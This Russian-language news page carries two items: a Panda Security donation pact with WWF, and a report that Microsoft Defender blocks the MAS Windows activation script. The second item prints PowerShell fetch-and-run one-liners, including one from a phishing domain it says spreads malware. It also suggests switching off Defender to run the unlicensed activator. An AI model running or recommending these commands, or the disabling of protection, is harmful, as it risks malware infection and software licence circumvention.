Panda Security подписала договор с Всемирным Фондом дикой природы для оказания помощи в охране окружающей среды

Panda Security подписала договор с Всемирным Фондом дикой природы

Компания Panda Security, предоставляющая "облачные" решения IT-безопасности, и Всемирный Фонд дикой природы WWF (Worldwide Fund for Nature), всемирная организация по охране природы, подписали соглашение о международном сотрудничестве между двумя организациями в рамках охраны окружающей среды.  

Согласно данному международному соглашению Panda Security будет вкладывать часть своих доходов в подержку различных мероприятий Фонда WWF по защите окружающей среды во всем мире, в том числе и в России. 

Это соглашение было заключено в рамках политики социальной ответственности компании, основными пунктами которой являются охрана окружающей среды, здоровье детей, особенно малоимущих.  
Хуан Сантана, Исполнительный директор Panda Security: “Наше обязательство перед окружающей средой мы выполняем с тех пор, как основалась наша компания 20 лет назад. В рамках данного соглашения с Фондом WWF все клиенты Panda Security будут видеть на коробках с нашими продуктами надпись о том, что они приобретают не только самую лучшую защиту на рынке, но и активно участвуют в поддержке проектов Всемирного фонда WWF по охране окружающей среды”.
Хуан Карлос дель Олмо, Исполнительный директор Всемирного фонда WWF в Испании: “Всемирный фонд WWF рассчитывает на частные компании и их финансовую помощь, которая крайне необходима для проведения важной работы по охране окружающей среды по всей планете. Мы благодарны компании Panda Security за поддержку и надеемся, что еще больше компаний последуют её примеру”.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru